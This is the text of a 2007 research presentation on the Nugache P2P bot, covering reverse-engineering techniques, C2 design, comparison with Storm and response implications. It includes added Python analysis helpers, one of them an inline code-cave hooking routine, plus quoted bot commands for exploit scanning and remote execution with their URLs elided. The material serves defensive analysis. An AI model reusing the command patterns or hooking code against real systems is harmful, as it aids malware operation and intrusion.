Understanding Emerging Threats: The case of Nugache
David Dittrich, University of Washington; Bruce Dang, Microsoft Corporation
Copyright © 2007 David Dittrich, Bruce Dang. All Rights Reserved.

Outline
- Practical techniques for reverse engineering
- Comparison of distributed intruder tool networks and evolution of features/tactics
- Nugache: new P2P malware
- Response implications
- Conclusions

Practical techniques
Packing, unpacking, identifying crypto, and patching (applied to Nugache)

Agenda
- Packing
- Generic unpacking techniques
- Recognizing "important" functions
- Identifying cryptographic mechanisms (with and without scripts)
- Patching and dynamic analysis

Packing
- strings(1) does not work well
- Hinders static analysis
- Dynamic analysis is a bit harder:
    - anti-debugging mechanisms (that you have not identified)
    - cannot set breakpoints wisely
- Creates anger

Generic unpacking methods
- The packed regions must be loaded, decrypted or decompressed, and executed
- (Most of the time) this implies mov reg, [mem]; a loop; then jmp/call reg or jmp/call [mem] (read, unpack loop, write, execute)
- Identify where these operations are happening:
    (1) Be lazy and just look for jmp/call reg, jmp/call [reg], jmp imm
    (2) Memory breakpoints on write/execute regions
    (3) "Guess" what library calls might be made and set a global breakpoint there (e.g., socket(), gethostbyname(), connect())
    (4) One instruction at a time…
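The "lazy" option (1) above, scanning a code region for the branch forms an unpacker's tail jump usually takes, as an added example that is not part of the original slides. It is a linear byte sweep that decodes only the x86-32 opcodes the heuristic needs (FF /2, FF /4 and E9), so it is a candidate finder rather than a disassembler: an 0xFF or 0xE9 inside data or an immediate produces a false positive that has to be ruled out in the debugger. The sample bytes are constructed for the demonstration.

```python
"""Find jmp/call reg, jmp/call [mem] and jmp rel32 candidates in raw x86-32 code.
Added example, not from the slides. Heuristic only: decodes just FF /2, FF /4, E9."""

REGS = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]


def _imm(code, pos, size):
    """Signed little-endian immediate; IndexError if the buffer is truncated."""
    if pos + size > len(code):
        raise IndexError("truncated instruction")
    return int.from_bytes(code[pos:pos + size], "little", signed=True)


def _decode_rm(code, i):
    """Decode the ModRM (+SIB, +disp) operand at code[i] -> (operand_text, bytes_consumed)."""
    modrm = code[i]
    mod, rm = modrm >> 6, modrm & 7
    n = 1
    if mod == 3:                                   # register direct: jmp/call reg
        return REGS[rm], n
    base, index, disp = None, None, 0
    if rm == 4:                                    # SIB byte follows
        sib = code[i + n]
        n += 1
        scale, idx, b = 1 << (sib >> 6), (sib >> 3) & 7, sib & 7
        if idx != 4:                               # index 4 means "no index register"
            index = f"{REGS[idx]}*{scale}"
        if not (b == 5 and mod == 0):              # base 5 with mod 0 means disp32, no base
            base = REGS[b]
    elif not (rm == 5 and mod == 0):               # rm 5 with mod 0 is an absolute disp32
        base = REGS[rm]
    if mod == 1:
        disp, n = _imm(code, i + n, 1), n + 1
    elif mod == 2 or (mod == 0 and base is None):
        disp, n = _imm(code, i + n, 4), n + 4
    parts = [p for p in (base, index) if p]
    if parts:
        text = "+".join(parts) + (f"{disp:+#x}" if disp else "")
    else:
        text = f"{disp & 0xffffffff:#x}"           # absolute address, printed unsigned
    return f"[{text}]", n


def find_branches(code, base=0):
    """Return [(va, mnemonic, target)] for every candidate tail-jump form in `code`."""
    hits = []
    i = 0
    while i < len(code):
        op = code[i]
        try:
            if op == 0xE9:                                         # jmp rel32
                rel = _imm(code, i + 1, 4)
                target = (base + i + 5 + rel) & 0xffffffff
                hits.append((base + i, "jmp", f"{target:#x}"))
                i += 5
                continue
            if op == 0xFF and ((code[i + 1] >> 3) & 7) in (2, 4):  # FF /2 = call, FF /4 = jmp
                reg_field = (code[i + 1] >> 3) & 7
                operand, n = _decode_rm(code, i + 1)
                hits.append((base + i, "call" if reg_field == 2 else "jmp", operand))
                i += 1 + n
                continue
        except IndexError:
            break
        i += 1
    return hits


# Constructed sample (not real malware): a few instructions an unpacker stub might end with.
SAMPLE = bytes.fromhex(
    "8b4508"           # mov eax, [ebp+8]
    "ffe0"             # jmp eax
    "90"               # nop
    "ff1578563412"     # call [0x12345678]
    "ff248500104000"   # jmp [eax*4+0x401000]
    "ff55fc"           # call [ebp-4]
    "e900000000"       # jmp to the next instruction
)

if __name__ == "__main__":
    for va, mnem, target in find_branches(SAMPLE, base=0x401000):
        print(f"{va:#x}: {mnem} {target}")
```

Run it over the bytes of a suspected unpacker region (for instance the tail of the packed section dumped from the debugger); every hit is a place to put a breakpoint before the original entry point executes.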

Recognizing "important" functions
- Familiarize yourself with common call chains and function relationships: socket, gethostbyname, connect, send, recv, close; CreateFile, ReadFile, WriteFile, CloseHandle, …
- Example: functions where send/recv occur are typically dealing with network data; hence, they will be processing important buffers
- Give friendly names and use cross-references to your advantage
- If they use encryption, they will need to encrypt the buffer before passing it to send; hence, trace backwards to where it was created and give it a friendly name such as "XXX_encrypt_buffer". The same applies for recv
- Use cross-references on strings, because they usually give important clues about the function itself: "NICK %s" + "JOIN %s" -> probably an IRC handler; "200 Command okay" + "212 Directory status" -> probably an FTP handler
- Identify a KNOWN function, then use cross-references to trace backwards and give it a meaningful name

Code is usually written by humans, so you can understand it too…

Identifying cryptographic mechanisms
WITH scripts:
- findcrypt (IDA and OllyDbg)
- KANAL, the Krypto ANALyzer plugin for PEiD
WITHOUT scripts:
- (symmetric) Identify S-box values (a huge array of integers). Use cross-references on the array and give it a friendly name; repeat until it makes sense. Matrix operations. Setkey -> encrypt
- (asymmetric) Identify common public exponents (65537, 31337) and big-integer multiplication
- (hash) HUGE functions which consist only of mov and arithmetic instructions. Think of common call chains: MD5Init -> MD5Update -> MD5Final. I wrote an IDA script to do this
- PRNG: no generic way. Identify common seeders (GetTickCount(), GetCursorPos(), time(NULL)), routines with lower/upper-bound arguments, and XREFs from functions that you suspect use a PRNG (e.g., random contact selection, …)
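What the findcrypt/KANAL scripts do, and what the manual "find the huge array and xref it" approach does by hand, reduced to a stand-alone scanner, as an added example that is not part of the slides. It searches a raw image for well-known constants as little-endian words and reports them whether they sit in a contiguous table or are scattered as immediates (a compiler may load an MD5 initial state with four mov instructions rather than from a table), and it also flags any 256-byte run that is a permutation of 0..255, which catches a custom S-box that no constant list knows. The sample image and its made-up S-box are constructed for the demonstration.

```python
"""Minimal findcrypt: known crypto constants plus a generic 8-bit S-box heuristic.
Added example, not from the slides. Searches little-endian words in a raw image."""
import struct

# Each signature is a tuple of byte fragments that must all occur near each other.
SIGNATURES = {
    "AES/Rijndael S-box": (bytes.fromhex("637c777bf26b6fc53001672bfed7ab76"),),
    "AES/Rijndael inverse S-box": (bytes.fromhex("52096ad53036a538bf40a39e81f3d7fb"),),
    "MD4/MD5/SHA-1 initial state": tuple(
        struct.pack("<I", w) for w in (0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476)),
    "MD5 T[1..2]": tuple(struct.pack("<I", w) for w in (0xD76AA478, 0xE8C7B756)),
    "SHA-1 round constants": tuple(struct.pack("<I", w) for w in (0x5A827999, 0x6ED9EBA1)),
    "SHA-256 K[0..1]": tuple(struct.pack("<I", w) for w in (0x428A2F98, 0x71374491)),
    # e=65537 as one dword (01 00 01 00) is common ordinary data, so a weak signal by itself.
    "RSA e=65537 (weak)": (struct.pack("<I", 65537),),
}


def scan(image: bytes, window: int = 64):
    """Return sorted [(offset, name, layout)]; layout is 'contiguous' or 'scattered'.
    A signature matches when its first fragment is found and every other fragment
    appears within `window` bytes after it (immediates spread over a few instructions)."""
    hits = []
    for name, pieces in SIGNATURES.items():
        first = pieces[0]
        pos = image.find(first)
        while pos != -1:
            region = image[pos:pos + window]
            if all(p in region for p in pieces[1:]):
                layout = "contiguous" if image.startswith(b"".join(pieces), pos) else "scattered"
                hits.append((pos, name, layout))
            pos = image.find(first, pos + 1)
    return sorted(hits)


def find_byte_permutations(image: bytes):
    """Offsets of 256-byte runs that are a permutation of 0..255: any 8-bit S-box,
    including custom ones. Quadratic but fine for a section-sized buffer."""
    return [off for off in range(0, len(image) - 255)
            if len(set(image[off:off + 256])) == 256]


# Constructed demo image (not a real binary): an S-box table start, an MD5 init
# state loaded as immediates, and a made-up permutation (i*167+13 mod 256 is a bijection).
CUSTOM_SBOX = bytes((i * 167 + 13) & 0xFF for i in range(256))
SAMPLE = (
    b"\x90" * 16
    + SIGNATURES["AES/Rijndael S-box"][0] + bytes(range(16, 48))   # only the first row is real
    + b"\xCC" * 8
    + bytes.fromhex("b801234567")      # mov eax, 67452301h
    + bytes.fromhex("bb89abcdef")      # mov ebx, 0EFCDAB89h
    + bytes.fromhex("b9fedcba98")      # mov ecx, 98BADCFEh
    + bytes.fromhex("ba76543210")      # mov edx, 10325476h
    + b"\xCC" * 8
    + CUSTOM_SBOX
    + b"\xCC" * 8
)

if __name__ == "__main__":
    for off, name, layout in scan(SAMPLE):
        print(f"{off:#06x} {name} ({layout})")
    for off in find_byte_permutations(SAMPLE):
        print(f"{off:#06x} 256-byte permutation (possible S-box)")
```

Feed it the bytes of a dumped (unpacked) section; a contiguous S-box hit is the array to cross-reference, and a scattered initial-state hit points at the init routine of a hash, which is where the MD5Init -> MD5Update -> MD5Final chain starts.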

Patching and dynamic analysis
- Identify the important routines you want to patch. Good targets are the ones that do the encryption/decryption
- There are several ways to do it
- Easiest patching method: write your logging function in a padding zone, carve out 5 bytes for a long JMP to the padding zone, then JMP back and resume execution
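The "easiest patching method" above carried through on an in-memory copy of the image, as an added example that is not from the slides: the first instructions of the routine are replaced by a 5-byte JMP into a padding zone (code cave), the cave receives the logging stub, the displaced original instructions, and a JMP back to the instruction after the hook site. The base address, cave offset, prologue and stub bytes are made up for the demonstration, and the stub is just pushad/popad (the logging code goes between them). The one thing the code cannot check for you is that the displaced instructions are position independent (no relative call/jmp, no EIP-relative data); confirm that in the disassembly before choosing the hook length.

```python
"""Inline detour through a code cave: 5-byte JMP out, stub + displaced bytes, JMP back.
Added example, not from the slides. Operates on a bytearray image mapped at base_va."""

JMP_OPCODE = 0xE9
NOP = 0x90


def jmp_rel32(src_va: int, dst_va: int) -> bytes:
    """Encode 'jmp dst' for placement at src; rel32 is relative to the next instruction."""
    rel = (dst_va - (src_va + 5)) & 0xFFFFFFFF
    return bytes([JMP_OPCODE]) + rel.to_bytes(4, "little")


def resolve_jmp(image: bytearray, base_va: int, va: int) -> int:
    """Follow a rel32 JMP at va and return its target (used to check the patch)."""
    off = va - base_va
    if image[off] != JMP_OPCODE:
        raise ValueError(f"no jmp at {va:#x}")
    rel = int.from_bytes(image[off + 1:off + 5], "little", signed=True)
    return (va + 5 + rel) & 0xFFFFFFFF


def install_detour(image: bytearray, base_va: int, hook_va: int,
                   displaced_len: int, cave_va: int, stub: bytes) -> bytes:
    """Patch `image` so entering hook_va runs `stub` in the cave, then the displaced
    original bytes, then resumes at hook_va + displaced_len. Returns the displaced bytes.
    `stub` must be position independent; displaced_len must cover whole instructions."""
    if displaced_len < 5:
        raise ValueError("need at least 5 bytes for the long JMP")
    hook_off, cave_off = hook_va - base_va, cave_va - base_va
    displaced = bytes(image[hook_off:hook_off + displaced_len])

    trampoline = bytearray(stub) + displaced
    trampoline += jmp_rel32(cave_va + len(trampoline), hook_va + displaced_len)

    # Refuse to clobber anything that does not look like section padding (00 or CC fill).
    cave = image[cave_off:cave_off + len(trampoline)]
    if len(cave) < len(trampoline) or any(b not in (0x00, 0xCC) for b in cave):
        raise ValueError("cave too small or not padding")
    image[cave_off:cave_off + len(trampoline)] = trampoline

    # 5-byte JMP plus NOP fill so the hook site still ends on an instruction boundary.
    image[hook_off:hook_off + displaced_len] = (
        jmp_rel32(hook_va, cave_va) + bytes([NOP]) * (displaced_len - 5))
    return displaced


# Constructed demo image (not a real binary): a routine prologue at the start,
# a ret, then INT3 padding with the cave at offset 0x80.
BASE_VA = 0x401000
PROLOGUE = bytes.fromhex("558bec83ec10")   # push ebp; mov ebp,esp; sub esp,0x10
STUB = bytes.fromhex("6061")               # pushad; popad (logging code goes between)


def demo() -> bytearray:
    image = bytearray(PROLOGUE + b"\xC3" + b"\xCC" * (0x100 - len(PROLOGUE) - 1))
    install_detour(image, BASE_VA, BASE_VA, len(PROLOGUE), BASE_VA + 0x80, STUB)
    return image


if __name__ == "__main__":
    img = demo()
    print("hook site:", img[:8].hex(" "))
    print("cave     :", img[0x80:0x8D].hex(" "))
```

Writing the patched bytes into a live process (or back into the PE file with the section's raw/virtual offsets and write/execute protections adjusted) is the part left out here; the arithmetic for both JMPs is what people get wrong, and resolve_jmp is there to check it before you run anything.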

To Sum Up
- Reverse engineering is non-trivial, but is a critical skill for agile response
- Static and dynamic analysis techniques complement each other (especially with C++)
- RE is under-appreciated as a software engineering discipline
- What can you learn from RE? (we move on…)

Comparison of Distributed Intruder Tool Networks
- Command and control (C2) structures for distributed malware
- Code reuse / feature convergence
- Tactical convergence and advances in attack methodologies

Command &amp; Control (C2) Structures
- Handler/Agent
- IRC botnet
- Peer to peer
Source: Command and control structures in malware: From Handler/Agent to P2P, by Dave Dittrich and Sven Dietrich, USENIX ;login: vol. 32, no. 6, December 2007, pp. 8-17

Propagation mechanisms
Technical exploit:
    1. Exploitation of remotely accessible vulnerabilities in the Windows LSASS (over SMB, 445/tcp or 139/tcp) and RPC-DCOM (135/tcp) services
Social engineering:
    2. Mass-mailing to addresses harvested from the Windows Address Book (WAB), except those containing specific substrings (e.g., "icrosof", "buse", "secur", "dmin", ".gov", ".mil")
    3. Messaging AIM and MSN buddy-list members with a randomly formed sentence and a URL
    4. Trojan horse dropper associated with "celebrity video clips"
    5. Trojan horse SETUP.EXE on a free download site

Nugache P2P bot
- Features
- Analysis and observations
    - April 30, 2006 through today
    - pcap (full packet), p0f, Snort
    - Collection using the Honeynet Project's Honeywall (versions roo and roo-1.1-RC-2)

Features
- Successful P2P C&amp;C
    - Originally on 8/tcp (now on random high-numbered ports)
    - All C2 over the P2P channel (including updates)
- Advanced use of crypto
    - RSA key exchange
    - Rijndael-256-OFB (with per-session symmetric keys)
    - Signed commands and binary (4096-bit key)
- Feature-rich, object-oriented shell command set
- Exposes only a limited subset of peers to traffic analysis

Feature Comparison: Storm vs. Nugache

Primary C2
    Storm: "pull" from C2 servers
    Nugache: P2P
Initial peer list seeding
    Storm: text file
    Nugache: built-in, or pre-loaded into the Registry (HKCU)
Use of crypto for C2 comms
    Storm: MD4 hash to conceal file names; 320-bit shared key
    Nugache: RSA key exchange, Rijndael-256-OFB session keys
Use of DNS in C2
    Storm: none / "fast flux" to hide C2 servers
    Nugache: none
Connectivity
    Storm: hundreds
    Nugache: ~1 dozen
Updates
    Storm: by command (not at all?)
    Nugache: automatic
Listening port
    Storm / Nugache: random high-numbered (Nugache originally on 8/tcp; see Features)
Architecture
    Storm: multipartite
    Nugache: monolithic
Detection
    Storm: visible on host; eDonkey traffic detectable by signature
    Nugache: visible on host; P2P traffic not easily detected by signature

Source: Analysis of the Storm and Nugache Trojans: P2P is here, Sam Stover, Dave Dittrich, John Hernandez, and Sven Dietrich, USENIX ;login: vol. 32, no. 6, December 2007

Analysis and Observations
- AV
- Network traffic analysis
- Propagation and DDoS activity

AV Scan Results (Dec. 2006) (figure only)

Unique IP Addresses Seen (figure only)

Seven Days in the Life… (figure only)

Example of use (from IRC), 2006/05/19 01:04 GMT
(target prefixes and the payload URL are elided in the transcript)
    #ch4nn3l :scan:exploit,lsass
    #ch4nn3l :scan:payload,HTTPEXEC,
    #ch4nn3l :scan:start,3000
    #ch4nn3l :scan:target,add, *
    #ch4nn3l :scan:target,add, *
    #ch4nn3l :scan:target,add, *
    #ch4nn3l :scan:target,add,R5000
    #ch4nn3l :scan:target,current
    #ch4nn3l :spaim:10
Replies:
    :LSASS Operating system ( ) is WinXP [213 times]
    :Sent execute to AIM_USER_NICK [103 times]

IRC Bots vs. 8/tcp Peers
Set            Time to observe
at2as.bots     34 mins.
l2k.bots       2 mins.
port8.peers    48 days

Propagation Events (figure only)

Social-Engineered Trojan Dropper Attack (figure only)

Indirect Propagation (figure only)

Download site (figure only; counts are from Site 2, not the site shown)

Features
- C&amp;C comms heavily encrypted (figure only)

Command Examples
Discrete commands:
    AIM.Spread(10);
    Scripts.AbortAll();
Looping:
    while(1){ HTTP.Visit(" 0); }
Logical operations:
    if(Rand(0,99)==0){ Sleep(Rand(0, )); Logs.Send(" ", 80); }
    if(!PVAR.IsSet("mail")){ HTTP.Execute(" PVAR.Set("mail", 1); }
Command sequences:
    Scan.Targets.Clear();
    Scan.SetPayload("HTTPEXEC", "
    Scan.SetExploit("asn1smbnt");
    Scan.Targets.Add("R ");
    Scan.Start(20000);
    [some time later…] Scan.Pause();
    [some time later…] Scan.Start();
    [some time later…] Scan.Stop();

Encryption/Signing of Commands
Command block:
    10|3|22|AIM.Spread(10);|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|D027C867
Signature block, decrypted with the embedded 4096-bit public key (PKCS#1 v1.5 block type 1: 01, a run of FF padding bytes, 00, then the bare 16-byte MD5 digest with no DigestInfo wrapper; the FF run is abbreviated here):
    01 FF FF … FF 00 B55A34436A2A6AD7DA837A21BA58E5CC
Validation:
    $ echo -n "AIM.Spread(10);D027C8673" | md5sum
    b55a34436a2a6ad7da837a21ba58e5cc  -
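The validation step from the slide done programmatically, as an added example that is not from the original presentation: strip the PKCS#1 v1.5 type 1 padding from the decrypted signature block and compare the bare MD5 digest it carries against the MD5 of the signed text. The RSA decryption itself is left out (the slide shows the already-decrypted block), and the sample block is built here with hashlib from the slide's text rather than copied from a bot. The check tolerates the missing leading 00 byte that results from printing the block as a big integer, as on the slide, and rejects short or malformed padding rather than scanning for a digest anywhere in the block.

```python
"""Verify a Nugache-style command signature block: 00 01 FF..FF 00 + raw MD5 digest.
Added example, not from the slides. No RSA here; input is the decrypted block."""
import hashlib
import hmac

MODULUS_BYTES = 4096 // 8          # the embedded public key is 4096 bits
MIN_PADDING = 8                    # PKCS#1 v1.5 requires at least 8 padding bytes


def build_type1_block(digest: bytes, modulus_bytes: int = MODULUS_BYTES) -> bytes:
    """00 01 FF..FF 00 digest, sized to the modulus (what the signer pads before RSA)."""
    pad_len = modulus_bytes - 3 - len(digest)
    if pad_len < MIN_PADDING:
        raise ValueError("digest too large for modulus")
    return b"\x00\x01" + b"\xff" * pad_len + b"\x00" + digest


def unpad_type1_block(block: bytes) -> bytes:
    """Strip the padding and return the payload; ValueError on any deviation.
    A leading 00 may be absent when the block was printed as a big integer."""
    if block[:1] == b"\x01":
        block = b"\x00" + block
    if block[:2] != b"\x00\x01":
        raise ValueError("bad block type")
    i = 2
    while i < len(block) and block[i] == 0xFF:
        i += 1
    if i - 2 < MIN_PADDING or i >= len(block) or block[i] != 0x00:
        raise ValueError("bad padding")
    return block[i + 1:]


def verify_command(decrypted_block: bytes, signed_text: bytes) -> bool:
    """True iff the block carries exactly the 16-byte MD5 of signed_text."""
    try:
        payload = unpad_type1_block(decrypted_block)
    except ValueError:
        return False
    expected = hashlib.md5(signed_text).digest()
    return len(payload) == 16 and hmac.compare_digest(payload, expected)


# The text the slide hashes: the command text followed by the trailing numeric field.
SIGNED_TEXT = b"AIM.Spread(10);D027C8673"
# Constructed block, i.e. what the slide shows after RSA decryption with the public key.
SAMPLE_BLOCK = build_type1_block(hashlib.md5(SIGNED_TEXT).digest())

if __name__ == "__main__":
    print("valid   :", verify_command(SAMPLE_BLOCK, SIGNED_TEXT))
    print("tampered:", verify_command(SAMPLE_BLOCK, b"AIM.Spread(11);D027C8673"))
```

Recovering the digest this way tells a responder that commands are authenticated with a key only the operator holds; it does not yield the private key, which is why the Response Implications slides treat command injection into the botnet as off the table and focus on peer enumeration instead.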

Enumeration Experiments
- Queried all reachable bots for:
    - connected peers (clients)
    - known peers
    - version, etc.
- 90 samples
- 160 hosts always up and reachable

Distribution of Bots by Country (figure only)

Enumeration Experiment #3 (figure only)

Patch Tuesday Effect (figure only)

Comparison with Storm (figures only)
Sources: Thorsten Holz's "Honeyblog"; Brandon Enright

Actual structure? Rotavirus (figure only)

Sub-graph (Degree 9+) (figure only)

Sub-graph (Degree 10) (figure only)

Comparison with Gnutella (figure only)
Source: "Visualizing Large and Dynamic Communication Networks,"

Response Implications
- Decreased visibility => more survivability
- Harder to stop, harder to trace back
- Expertise needed to infiltrate new botnets
- Cooperative, collaborative, and optimized response needed

Operations Considerations
- DDoS victims: collect all source IPs (and whatever else you can collect)
- Sites with attacking peers: collect full packet data ASAP
    - Honeywall useful at LAN level to collect data and minimize potential for harm
- Ensure log times are complete and accurate
- Record IP -> DNS mappings (and the time!)
- Put data collection at equal priority with takedown

Conclusions
- Response is about to get a LOT harder
- C&amp;C less important; identifying peer connections more important
- Experts (with reverse engineers) must be engaged early
- Collaborative/cooperative response will become essential (lots of opportunities to optimize)
- There is much research left to do…

Thanks and questions
Help from: Sven Dietrich (Stevens Institute of Technology), John Hernandez (UW Tacoma), Sam Stover (iSIGHT Partners), "others"
Contacts:
    Bruce Dang, Microsoft, bda(at)microsoft.com
    Dave Dittrich, University of Washington, dittrich(at)u.washington.edu